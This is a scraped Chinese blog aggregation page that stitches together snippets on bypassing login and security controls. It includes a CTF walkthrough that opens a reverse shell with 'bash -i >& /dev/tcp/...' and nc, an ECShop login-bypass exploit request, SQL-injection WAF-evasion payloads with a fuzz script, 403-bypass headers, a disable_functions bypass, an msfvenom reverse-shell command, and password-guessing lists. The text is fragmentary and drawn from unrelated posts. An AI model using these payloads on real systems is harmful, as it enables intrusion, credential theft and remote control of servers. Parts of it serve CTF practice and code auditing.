精华内容
下载资源
问答
  • 很多网站都是注册之后才能享受一系列相关服务的,例如YouTube,但是,注册有时候显得很浪费时间,所以这个软件就诞生了。使用这个软件,可以提供给你多达174166个(目前)网站的免费ID,你可以直接使用这些ID来登陆...
  •  这样就能用后台数据库中并不存在的密码来绕过并登录成功:  下面进入一个命令执行的页面:  看了一些wp,有的是用py脚本进行爆破,命令执行的结果太乱了,看不出什么门道,最后还是采用的反弹shell来做的...

    hint:union,命令执行

    我们的第一步就是要利用union注入进行登录了,bp抓个包看看:

     相应头这里还是给了我们一个tip的,base64解码得到:

    $sql="SELECT username,password FROM admin WHERE username='".$username."'";
    if (!empty($row) && $row['password']===md5($password)){
    }

    这告诉我们要登录要满足的条件:查询结果不为空,其次,输入的password的值要等于md5(password)。

    利用union进行如下post:

     这样就能用后台数据库中并不存在的密码来绕过并登录成功:

     下面进入一个命令执行的页面:

     看了一些wp,有的是用py脚本进行爆破,命令执行的结果太乱了,看不出什么门道,最后还是采用的反弹shell来做的。

    反弹shell需要有公网ip,我们假设有个公网ip192.168.10.130,不用公网ip的话就线下赛局域网做题也行。

    输入bash -i >& /dev/tcp/192.168.10.130/8888 0>&1并执行,然后在kali上运行命令:nc -lvp 8888,就能进行连接了,找到flag文件就拿到flag了。

    展开全文
  • 影响文件:flow.php188行开始elseif ($_REQUEST['step'] == 'login'){include_once('languages/'. $_CFG['lang']. '/user.php');/** 用户登录注册*/if ($_SERVER['REQUEST_METHOD'] == 'GET').....else{include_once...

    影响文件:flow.php 188行开始

    elseif ($_REQUEST['step'] == 'login')

    {

    include_once('languages/'. $_CFG['lang']. '/user.php');

    /*

    * 用户登录注册

    */

    if ($_SERVER['REQUEST_METHOD'] == 'GET')

    .....

    else

    {

    include_once('includes/lib_passport.php');

    if (!empty($_POST['act']) && $_POST['act'] == 'signin')

    {

    $captcha = intval($_CFG['captcha']);

    if (($captcha & CAPTCHA_LOGIN) && (!($captcha & CAPTCHA_LOGIN_FAIL) || (($captcha & CAPTCHA_LOGIN_FAIL) && $_ SESSION['login_fail'] > 2)) && gd_version() > 0)

    {

    if (empty($_POST['captcha']))

    {

    show_message($_LANG['invalid_captcha']);

    }

    /* 检查验证码 */

    include_once('includes/cls_captcha.php');

    $validator = new captcha();

    $validator->session_word = 'captcha_login';

    if (!$validator->check_word($_POST['captcha']))

    {

    show_message($_LANG['invalid_captcha']);

    }

    }

    if ($user->login($_POST['username'], $_POST['password'],isset($_POST['remember'])))

    {

    .....

    }

    上面代码中执行了 登录操作 $user­>login($_POST['username'], $_POST['password'],isset($_POST['remember'])

    login方法如下:

    function login($username, $password, $remember = null)

    {

    if ($this->check_user($username, $password) > 0)

    {

    if ($this->need_sync)

    {

    $this->sync($username,$password);

    }

    $this->set_session($username);

    $this->set_cookie($username, $remember);

    return true;

    }

    else

    {

    return false;

    }

    }

    function check_user($username, $password = null)

    {

    $post_username = $username;

    /* 如果没有定义密码则只检查用户名 */

    if ($password === null)

    {

    $sql = "SELECT " . $this->field_id .

    " FROM " . $this->table($this->user_table).

    " WHERE " . $this->field_name . "='" . $post_username . "'";

    return $this->db->getOne($sql);

    }

    else

    {

    $sql = "SELECT " . $this->field_id .

    " FROM " . $this->table($this->user_table).

    " WHERE " . $this->field_name . "='" . $post_username . "' AND " . $this->field_pass . " ='" . $this-> compile_password(array('password'=>$password)) . "'";

    return $this->db->getOne($sql);

    }

    }

    登录操作最终执行check_user方法,当用户密码为null时,只判断用户名。而在flow.php中并没有对密码进行判断或者初始化。可以只通过账号就可

    以实现登录。

    漏洞利用过程

    url:.xxx.com/flow.php?step=login 

    POST:act=signin&username=xxxx&captcha=yyyyy

    captcha是验证码,有时候是不需要验证码的

    1.png

    loading-bars.svg

    展开全文
  • 绕过专题

    2021-01-20 19:13:32
    绕过验证码专题 原理: 直接截取返回包的cookie或者json流中的验证码进行绕过,提取出验证码进行直接验证即可–>绕过 方法 利用burp中的Extractor或者是Bp自带的Marco进行自动化测试 典型类型: ①如返回包的...

    ①绕过验证码专题

    原理:
    直接截取返回包的cookie或者json流中的验证码进行绕过,提取出验证码进行直接验证即可–>绕过
    方法
    利用burp中的Extractor或者是Bp自带的Marco进行自动化测试

    典型类型:

    ①如返回包的cookie中可截取验证码
    ②返回包的json流中可能有验证码
    

    万能验证码

    0000与9999
    

    空验证码

    code=undefined
    

    ②403绕过专题

    方法

    ①端口利用-->一个站不同的端口测
    ②修改host-->收集一个资产的相关ip,进行测不同host请求状况
    ③覆盖请求url
    绕的参数-->X-Original-URL和X-Rewrite-URL标头绕过Web服务器的限制。(可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。)
    即覆盖参数请求思路-->即服务器支持该两种请求状况思路时可利用绕
    如
    #常见于-->后台登录时一闪而过,要求验证类
    从http header方面bypass
    
    Request
      GET /auth/login HTTP/1.1
      Response
      HTTP/1.1 403 Forbidden
      
      Reqeust
      GET / HTTP/1.1
      X-Original-URL: /auth/login
      Response
      HTTP/1.1 200 OK
     
      or
      
      Reqeust
      GET / HTTP/1.1
      X-Rewrite-URL: /auth/login
      Response
      HTTP/1.1 200 OK
     除了这些还可绕思路
    302跳转:拦截并drop跳转的数据包,使其停留在当前页面,修改返回的302为200,然后删除掉Location字段。即可绕过
    #从url参数方面bypass
    /admin/panel    # ===> 403
    /admin/monitor  # ===> 200
    /admin/monitor/;panel   # ===> 302
    web.com/admin   # ===> 403
    
    web.com/ADMIN       # ===> 200
    web.com/admin/      # ===> 200
    web.com/admin/.     # ===> 200
    web.com//admin//    # ===> 200
    web.com/./admin/./  # ===> 200
    web.com/./admin/..  # ===> 200
    web.com/%2f/admin/  # ===> 200
    web.com/admin.json  # ===> 200(ruby)
    web.com/%2e/admin   # ===> 200
    web.com/%252e/admin # ===> 200
    web.com/%ef%bc%8fadmin  # ===> 200
    web.com/admin       # ===> 302
    web.com/admin..;/   # ===> 200
    #从协议上bypass
    http://web.com/admin    # ===> 403
    https://web.com/admin   # ===> 200
    ④referer绕
    添加一个ReFerer参数进行绕
    ReFerer:https://xxx/auth/login
    ⑤代理ip方式绕
    如该类参数
     X-Originating-IP: 127.0.0.1
    - X-Remote-IP: 127.0.0.1
    - X-Client-IP: 127.0.0.1
    - X-Forwarded-For: 127.0.0.1
    - X-Forwared-Host: 127.0.0.1
    - X-Host: 127.0.0.1
    - X-Custom-IP-Authorization: 127.0.0.1
    

    在这里插入图片描述
    相关插件

    ③绕upload专题

    upload绕
    文件上传绕过技巧总结

    ④绕sql注入专题

    绕云锁sql注入

    and if(ascii(substr((/*!50000%53elect*/column_name from information_schema.columns where table_schema=database/**/() and table_name='xxxx' limit 0,1),1,1))>96,1,sleep/**/(5))
    

    典型分析链接

    sql注入绕过特殊姿势

    #常见可试绕过思路
    --%0a union --%0a select 
    #常见可测试点
    order by,group by,{$var}
    #mysql
    Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0
    数据库是Mysql,可以尝试使用&&替换and,如:' && '1'='1,' %26%26 '1'='1
    数据库是Mysql,waf过滤了=,可尝试用like替代。如:and 1 like 1
    

    绕waf

    ①识别waf
    两个工具
    ②三个fuzz工具
    https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
    https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
    https://github.com/foospidy/payloads
    ③常用fuzz脚本
    def fuzzing(payload):
        payloads = []
        special_chars = ['\r', '\n', '\t', '_', '~', '&', '-', '=', '/', '*','^', '$', ',', '.', '/', '<', '>', '|', '/**/', '--','\r\n', '||']
        #special_chars 字典在步骤2中选择合适的
        for char in special_chars:
            for k in range(len(payload)):
                try:
                    temp_payload = payload[:k] + char + payload[k:]
                    payloads.append(temp_payload)
                except Exception as e:
                    print(e)
    
        return payloads
    

    sql注入bypass
    注意点
    1.版本导致注入问题
    mysql版本4.1时,因为不存在默认表,所以可能出现爆不出表的情况

    ⑤绕目录遍历

    #利用其绕读取
    …/./
    

    #如即–>目录遍历
    在这里插入图片描述

    ⑥绕函数禁用类

    四种方法
    ①攻击后端组件,寻找存在命令注入的、web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞

    ②寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的 popen()、proc_open()、pcntl_exec(),逐一尝试,或许有漏网之鱼;

    ③mod_cgi 模式,尝试修改 .htaccess,调整请求访问路由,绕过 php.ini 中的任何限制;

    ④利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。

    需要利用条件:
    ①php需要支持putenv()、mail()函数
    ②linux环境下
    绕shell时遇到函数禁用
    ①插件工具

    
    https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
    

    构造执行命令

    Payload:http://xxx/dp1.php?cmd=whoami&outpath=/tmp/xx&sopath=/xxx/dp1.so**
    ②蚁剑插件绕
    php版本7的话直接梭哈
    如linux下
    找到sock文件

    /tmp/php-cgi-56.sock
    

    在这里插入图片描述
    执行即可获得一个马
    在这里插入图片描述

    然后直接执行后
    进行连接
    这个.antproxy.php
    密码为原来马的密码
    在这里插入图片描述
    然后连接执行即可绕过

    但是注意这个绕只可绕一会,然后就会断掉
    所以接着绕法

    msfs生成一个马,上传到这个上面,然后在这几分钟里面进行执行命令,从而实现监听
    #如
    msfvenom -p linux/x64/shell_reverse_tcp -i 5 LHOST=x.x.x.x LPORT=80 -f elf -o /root/shell.elf
    

    在这里插入图片描述
    ③组件思路
    bypass disable_function总结
    中间组件bypass

    ⑦字典爆破思路

    撞库
    常见手机号
    常见登录账号(admin、manager、test、deme)
    数字组合(0-9、00-99、000-999、0000-9999、00000-99999)
    拼音(zhangsan、zhang.san、zhangs)
    中文(张三、李四、张san)
    英文名(Tom、Jeo、Cherry)
    单位名(zssx123、zssx@123)
    地名(beijing123、beijing@123)
    组合(地名+单位名)
    域名(baidu@123、JD@123)
    生日组合
    

    ⑧绕目录限制

    方法:新建一个.user.ini 文件
    里面内容下面这个,从而实现绕过php.ini文件

    open_basedir=:/
    
    展开全文
  • 渗透测试——WAF绕过原理

    千次阅读 2019-10-15 15:32:42
    渗透测试——WAF绕过原理 WAF绕过必要条件 1,熟练掌握mysql函数和语法使用方法 2,深入了解中间件运行处理机制 3,了解WAF防护处理原理和方法 一,WAF绕过原理——白盒绕过 代码样例 $sql="SELECT * FROM users ...

    渗透测试——WAF绕过原理

    WAF绕过必要条件
    1,熟练掌握mysql函数和语法使用方法
    2,深入了解中间件运行处理机制
    3,了解WAF防护处理原理和方法
    一,WAF绕过原理——白盒绕过
    代码样例

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    	$result=mysql_query($sql);
    	$row = mysql_fetch_array($result);
    	if($row)
    	{
    	  	echo "<font size='5' color= '#99FF00'>";	
    	  	echo 'Your Login name:'. $row['username'];
    	  	echo "<br>";
    	  	echo 'Your Password:' .$row['password'];
    	  	echo "</font>";
      	}
    	else 
    	{
    		echo '<font color= "#FFFF00">';
    		print_r(mysql_error());
    		echo "</font>";  
    	}
    }
    else 
    { 
    	echo "Please input the ID as parameter with numeric value";
    }
    
    
    function blacklist($id)
    {
    	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
    	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
    	
    	return $id;
    }
    

    1,1代码分析
    这个通过分析代码发现定义了blacklist黑名单功能然后是直接正则匹配过滤了or和and并忽略大小写
    1,2绕过限制
    因为这里匹配的是or 和AND
    (1)大小写变形:Or OR oR
    (2)等价替换:and=&& or=||
    二,WAF绕过原理——黑盒绕过
    1,架构层绕过WAF
    (1)寻找源站——>针对云waf
    (2)利用同网段——>绕过waf防护区域
    (3)利用边界漏洞——>绕过waf防护区域
    2,资源限制角度绕过waf
    post传入大的数据包body
    3,协议层面绕过waf检测
    (1)协议为覆盖waf
    请求方式变换:GET->POST
    Content-Type变换:application/x-www-form-urlencoded————>multipart/form-data
    (2)参数污染
    index.php?id=1&id=2
    这里遇到的是waf只是针对第一传参进行检测未对第二个传参进行检测
    4,规则层面绕过
    4.1sql注释符绕过

    1union /**/select2union /*aaaaaaa%01bbs*/select3union /*aaaaaaaaaaaaaaaaaaaaa*/select4)内联注释:/*!xxxxxxxx*/
    

    4.2空白符绕过
    (1)mysql空白符

    %09,%0A,%0B,%0C,%0D,%20,%A0,/*xxx*/`
    

    (2)正则匹配的空白符:

    %09,%0A,%0B,%0D,%20
    

    4.3函数分隔符号
    (1)concat%2520(
    (2)concat/**/(
    (3)concat%250c(
    (4)concat%25a0(
    4.4浮点数词解析
    (1)selectfrom users where id=8E0union select 1,2,3,4,5,6,7#
    (2)select
    from users where id=8.0union select 1,2,3,4,5,6,7#
    (3)select*from users where id=\Nunion select 1,2,3,4,5,6,7#
    4.5利用报错进行sql注入
    error-based sql注入函数非常容易被忽略

    (1)extractvalue(1,concat(0x5c,md5(3)));
    (2)updatexml(1,concat(0x5c,md5(3)));
    (3)GeometryCollection(select *from (select *from (select @@version)x))
    (4)polygon((select *from (select name_const(version(),1))x))
    (5)linestring()
    (6)multipoint()
    (7)multilinestring()
    (8)multipolygon()
    

    4.6mysql特殊语法

    select {x table_name}from{x information_schema.tables};
    

    三,Fuzz绕过WAF
    1,以注释符为例子不断fuzz
    (1)先测试最基本的语句
    union/**/select
    (2)再测试中间引入特殊字符
    union/aaaa%01bbs/select
    (3)最后测试注释长度
    union/aaaaaaaaaaaaaaaaaaaaaa/select
    最基本的模式
    union/anything/select

    展开全文
  • 绕过同源策略

    2019-06-01 19:58:31
    绕过同源策略绕过同源策略理解同源策略SOP与DOMSOP与CORSSOP与插件通过界面伪装理解SOP通过浏览器历史理解SOP绕过SOP技术在Java中绕过SOP在Adobe Reader中绕过SOP 绕过同源策略 理解同源策略 同源:拥有相同主机名...
  • SQL注入绕过防火墙

    千次阅读 2018-08-08 17:12:51
    SQL注入绕过防火墙 sql注入简介 SQL注入-基本概念 注释绕过 案例变更 替换关检测 高级方法 认证绕过 标准 作者 SQL注入绕过防火墙 这篇文章是我翻译OWASP官网上的一篇文章,原文链接:SQL Injection By...
  • shal()函数绕过和session验证绕过

    千次阅读 2019-04-18 14:53:25
    一、shal()函数绕过 <?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password can not be your name!...
  • SQL注入中的WAF绕过技术

    千次阅读 2019-07-27 18:02:28
    1.大小写绕过 这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。 2.简单编码绕过 比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就...
  • WAF绕过必要条件 1,熟练掌握mysql函数和语法使用方法 2,深入了解中间件运行处理机制 3,了解WAF防护处理原理和方法 一,WAF绕过原理——白盒绕过 代码样例 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1...
  • Login–password=’".md5($pass,true)."’ 进入题目,有一个输入框,让你输入密码,发现输入啥都没变化: 源码中一点线索也没有。 我们随便输入并抓个包看看又什么秘密: 发现提示hint: select * from 'admin' ...
  • 绕过SSL证书

    2014-09-25 10:26:11
    微信公众平台现在采取的https的登录,但是免签名的,我试过用代码的话,用http也是可以登录的,我这里采取的还是https,现在写代码绕过https检查,然后再登录,具体实现如下: MySecureProtocolSocketFactory....
  • 登陆前端绕过

    千次阅读 2020-03-31 17:22:16
    ... ... 4.然后用正确的密码登录,抓包,返回包多了 一个Set-Cookie,存在用户id,状态码为1,类容长度为30,然后放行 5.登录成功 ...6.在用错误的密码登陆时,伪造返回包就可以绕过验证直接登录 ...
  • 代码审计之盾灵原创文章投稿系统后台绕过漏洞
  • 暴力破解绕过token限制

    千次阅读 2021-09-01 16:51:41
    这里记录一下绕过token限制的方法。 首先使用BurpSuite抓包, 发送到intruter模块,并对需要爆破的目标位置进行设置。(这里主要是为了演示绕过token限制,所以假设已知用户名为admin) 给password设置字典 user_...
  • 绕过会话验证php

    2019-03-13 19:30:42
    <p>Can Anyone bypass my Login page if they can bypass it how they ...if(isset($_SESSION['login']) == "Owner" or isset($_SESSION['login']) == "admin"){ echo 'login In'; } ?> </code></pre> </div>
  • WAF技术以及SQL绕过

    千次阅读 2018-11-10 18:50:02
    另外平时听得多一点的可能是utf-7的绕过,还有utf-16、utf-32的绕过,后者从成功的实现对google的绕过   3.替换关键字 这种情况下大小写转化无法绕过,而且正则表达式会替换或删除select、union这些...
  • 之前介绍过通过cookie 绕过验证码实现登录的方法。这里并不多余,会增加分析和另外一种方法实现登录。 1、思路介绍  1.1、直接看代码,内有详细注释说明 # FileName : Wm_Cookie_Login.py # Author : Adil # ...
  • python通过cookies实现绕过登录 通过使用cookies实现接口测试的绕过登录。可以通过init每次调用get_cookies()来实现。 # -*- coding:utf-8 -*- # @time :2020/7/1 11:22 # @Author :oh!jack! # @File : cookies...
  • 这篇文章主要介绍了python GUI自动化实现绕过验证码登录,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 1. 获取cookies  实现代码如下: import time from ...
  • 绕过网站身份验证

    2014-11-14 22:45:22
    <pre><code> $req="select id from USERS where login='$login' and pwd='$pass'"; $result = mysql_query($req); </code></pre> <p>If I have a user's login for example login1 that is already in the ...
  • 扫雷器 用于类 Unix 系统(GNU/Linux、macOS、BSD)的 MineSweeper 命令行版本。 先决条件 C ++ 11编译器 安装 克隆回购。 ... cd 到 MineSweeper 文件夹,然后使用 Makefile 构建它。... (如果需要,更改 Makefile 中的...
  • 逗号拦截绕过

    2019-06-08 16:58:00
    查看源码按源码提示输入login.php?id=1 burp抓包后也没什么有价值的信息。看了别人的wp发现,需要对第一个页面抓包,然后可以找到一个302重定向。简单理解就是在我们进入题目的那一刻有一个页面跳转。 真实...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 16,528
精华内容 6,611
关键字:

绕过login